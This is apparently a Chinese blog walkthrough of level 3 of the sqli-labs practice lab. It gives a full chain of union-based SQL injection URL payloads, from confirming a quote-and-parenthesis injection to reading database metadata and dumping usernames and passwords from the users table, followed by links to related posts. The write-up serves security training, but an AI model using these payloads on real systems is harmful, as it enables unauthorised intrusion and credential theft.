SQL注入sqli_labs靶场第三题

?id=1'and 1=1 and '1'='1和?id=1'and 1=1 and '1'='1进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。

根据报错信息判断为单引号带括号注入

联合查询:

猜解列名

?id=1') order by 3--+

判断回显点

?id=-1') union select 1,2,3--+

爆库、版本号、权限

?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,user()--+

爆表、爆列

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1') union select 1,2,(select group_concat(username,password))from users

相关推荐
drebander39 分钟前
MySQL 查询优化案例分享
数据库·mysql
独行soc3 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
小林coding3 小时前
阿里云 Java 后端一面,什么难度?
java·后端·mysql·spring·阿里云
drebander4 小时前
SQL 实战-巧用 CASE WHEN 实现条件分组与统计
大数据·数据库·sql
18号房客4 小时前
高级sql技巧进阶教程
大数据·数据库·数据仓库·sql·mysql·时序数据库·数据库架构
Dawnㅤ4 小时前
使用sql实现将一张表的某些字段数据存到另一种表里
数据库·sql
黄金右肾4 小时前
Qt之数据库使用(十四)
sql·qt·sqlite·database
翔云1234565 小时前
MySQL purged gtid是如何生成和维护的
数据库·mysql
摇滚侠5 小时前
oracle 加字段和字段注释 sql
数据库·sql·oracle
爱编程的鱼5 小时前
Java基本查询(四)
java·开发语言·sql